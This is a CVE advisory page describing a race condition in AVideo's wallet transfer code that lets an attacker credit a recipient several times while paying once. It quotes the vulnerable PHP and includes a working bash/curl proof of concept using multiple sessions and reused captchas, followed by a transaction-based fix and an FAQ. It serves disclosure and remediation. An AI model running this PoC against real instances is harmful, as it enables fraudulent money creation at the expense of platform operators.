CVE-2026-34368: AVideo Vulnerable to Wallet Balance Double-Spend via TOCTOU Race Condition in transferBalance

Published Mar 27, 2026
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Updated

Summary

The transferBalance() method in plugin/YPTWallet/YPTWallet.php contains a Time-of-Check-Time-of-Use (TOCTOU) race condition. The method reads the sender's wallet balance, checks sufficiency in PHP, then writes the new balance — all without database transactions or row-level locking. An attacker with multiple authenticated sessions can send concurrent transfer requests that all read the same stale balance, each passing the balance check independently, resulting in only one deduction being applied while the recipient is credited multiple times.

Details

The vulnerable code path in plugin/YPTWallet/YPTWallet.php:450-517:

php // Line 473-474: READ - fetch current balance (plain SELECT, no FOR UPDATE) $senderWallet = self::getWallet($fromUserId); $senderBalance = $senderWallet->getBalance(); $senderNewBalance = $senderBalance - $amount;

// Line 477: CHECK - verify sufficient funds in PHP if ($senderNewBalance < 0) { return false; }

// Line 486-487: WRITE - set new balance (plain UPDATE) $senderWallet->setBalance($senderNewBalance); $senderWalletId = $senderWallet->save();

// Line 497-502: Credit receiver (also plain SELECT + UPDATE) $receiverWallet = self::getWallet($toUserId); $receiverBalance = $receiverWallet->getBalance(); $receiverNewBalance = $receiverBalance + $amount; $receiverWallet->setBalance($receiverNewBalance); $receiverWalletId = $receiverWallet->save();

The getWallet() method (YPTWallet.php:244) calls Wallet::getFromUser() (Wallet.php:69-84) which executes a plain SELECT FROM wallet WHERE usersid = $usersid with no FOR UPDATE clause. The save() method (Wallet.php:105) calls ObjectYPT::save() (Object.php:293) which executes a plain UPDATE — no transaction wrapping.

Race window: Between the SELECT (step 1) and UPDATE (step 3), all concurrent requests see the same original balance. Each independently computes original - amount, passes the check, and writes back. The last writer wins for the sender (only one deduction effective), but the receiver gets credited once per request.

Why concurrent requests succeed: PHP's file-based session locking serializes requests per session. However, an attacker can create multiple login sessions (different PHPSESSID cookies) for the same user account. Each session has its own lock and can execute concurrently. Each session needs its own captcha, but the captcha validation in objects/captcha.php:58-73 compares $SESSION['palavra'] without unsetting it after validation, allowing unlimited reuse within each session.

Entry point: plugin/YPTWallet/view/transferFunds.json.php:39 calls YPTWallet::transferBalance(User::getId(), $POST['usersid'], $POST['value']) — requires only User::isLogged() and a valid captcha.

PoC

bash Prerequisites: Attacker has a registered account with $10 wallet balance Accomplice has a registered account (recipient)

TARGET="https://target-avideo-instance" ACCOMPLICEID=123 # recipient user ID

Step 1: Create 5 independent sessions for the same attacker account declare -a SESSIONS declare -a CAPTCHAANSWERS

for i in $(seq 1 5); do # Login and capture session cookie COOKIE=$(curl -s -c - "$TARGET/objects/login.json.php" \ -d 'user=attacker&pass=attackerpass' | grep PHPSESSID | awk '{print $NF}') # Load captcha to populate $SESSION['palavra'] curl -s -b "PHPSESSID=$COOKIE" "$TARGET/objects/captcha.php" -o "captcha$i.png" SESSIONS[$i]=$COOKIE echo "Session $i: $COOKIE — solve captcha$i.png manually" done

Step 2: After solving captchas, fire all 5 transfer requests simultaneously Each requests $10 transfer — all will read balance=$10 concurrently for i in $(seq 1 5); do curl -s -b "PHPSESSID=${SESSIONS[$i]}" \ "$TARGET/plugin/YPTWallet/view/transferFunds.json.php" \ -d "usersid=$ACCOMPLICEID&value=10&captcha=${CAPTCHAANSWERS[$i]}" & done wait

Expected result: - Attacker balance: $0 (last write wins, sets balance to 10-10=0) - Accomplice balance: credited $10 x N successful races (up to $50) - Net money created from nothing: up to $40

Impact

An authenticated attacker can exploit this race condition to:

- Create wallet balance from nothing: With a $10 balance and N concurrent requests, the recipient can receive up to $10×N while the sender only loses $10. - Bypass pay-per-view charges: Inflate wallet balance, then purchase paid content without real payment. - Bypass subscription fees: Use inflated balance to purchase subscriptions. - Financial integrity compromise: The wallet ledger becomes inconsistent — total balances across all users no longer match total deposits.

The attack requires solving one captcha per session (captchas are reusable within a session), creating multiple login sessions, and timing concurrent requests — achievable with basic scripting.

Recommended Fix

Replace the read-check-write pattern with an atomic database operation using a transaction and row-level locking:

php public static function transferBalance($fromUserId, $toUserId, $amount, $customDescription = "", $forceTransfer = false) { global $global; // ... existing auth and validation checks ... $amount = floatval($amount); if ($amount <= 0) { return false; }

// Use a database transaction with row-level locking $global['mysqli']->autocommit(false); $global['mysqli']->begintransaction(); try { // Lock sender row and read balance atomically $sql = "SELECT id, balance FROM wallet WHERE usersid = ? FOR UPDATE"; $stmt = $global['mysqli']->prepare($sql); $stmt->bindparam("i", $fromUserId); $stmt->execute(); $result = $stmt->getresult(); $senderRow = $result->fetchassoc(); $stmt->close(); if (empty($senderRow)) { $global['mysqli']->rollback(); return false; } $senderBalance = floatval($senderRow['balance']); $senderNewBalance = $senderBalance - $amount; if ($senderNewBalance < 0) { $global['mysqli']->rollback(); return false; } // Atomic deduction $sql = "UPDATE wallet SET balance = ? WHERE id = ? AND balance >= ?"; $stmt = $global['mysqli']->prepare($sql); $stmt->bindparam("did", $senderNewBalance, $senderRow['id'], $amount); $stmt->execute(); if ($stmt->affectedrows === 0) { $global['mysqli']->rollback(); $stmt->close(); return false; } $stmt->close(); // Credit receiver (also locked) $sql = "SELECT id, balance FROM wallet WHERE usersid = ? FOR UPDATE"; $stmt = $global['mysqli']->prepare($sql); $stmt->bindparam("i", $toUserId); $stmt->execute(); $result = $stmt->getresult(); $receiverRow = $result->fetchassoc(); $stmt->close(); $receiverNewBalance = floatval($receiverRow['balance']) + $amount; $sql = "UPDATE wallet SET balance = ? WHERE id = ?"; $stmt = $global['mysqli']->prepare($sql); $stmt->bindparam("di", $receiverNewBalance, $receiverRow['id']); $stmt->execute(); $stmt->close(); $global['mysqli']->commit(); // ... log entries ... } catch (Exception $e) { $global['mysqli']->rollback(); return false; } finally { $global['mysqli']->autocommit(true); } }

Additionally, fix the captcha reuse issue in objects/captcha.php:58-73 by unsetting $SESSION['palavra'] after successful validation:

php public static function validation($word) { // ... existing checks ... $validation = (strcasecmp($word, $SESSION["palavra"]) == 0); if ($validation) { unset($SESSION["palavra"]); // Consume the captcha token } return $validation; }

Other sources

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the transferBalance() method in plugin/YPTWallet/YPTWallet.php contains a Time-of-Check-Time-of-Use (TOCTOU) race condition. The method reads the sender's wallet balance, checks sufficiency in PHP, then writes the new balance — all without database transactions or row-level locking. An attacker with multiple authenticated sessions can send concurrent transfer requests that all read the same stale balance, each passing the balance check independently, resulting in only one deduction being applied while the recipient is credited multiple times. Commit 34132ad5159784bfc7ba0d7634bb5c79b769202d contains a fix.

MITRE

Affected Software

3 affected components
WWBN AVideo<=26.0
composer/wwbn/avideo<=26.0
WWBN AVideo<=26.0

Event History

Mar 27, 2026
CVE Published
via MITRE·06:12 PM
Data Sourced
via MITRE·06:12 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·06:16 PM
RemedyDescriptionSeverityWeaknessAffected Software
Mar 30, 2026
Advisory Published
via GitHub·05:51 PM
Data Sourced
via GitHub·05:51 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-34368?

CVE-2026-34368 is classified as a high severity vulnerability due to the potential for a wallet balance double-spend exploit.

2

How do I fix CVE-2026-34368?

To fix CVE-2026-34368, it is recommended to update AVideo to version 26.1 or later, which addresses the TOCTOU race condition.

3

What versions of AVideo are affected by CVE-2026-34368?

AVideo versions up to and including 26.0 are affected by CVE-2026-34368.

4

What impact does CVE-2026-34368 have on users?

CVE-2026-34368 may allow an attacker to exploit wallet transfers, leading to potential financial loss for users.

5

Where can I find more details about CVE-2026-34368?

Details about CVE-2026-34368 can typically be found in the security advisories and commit documentation from the developers.

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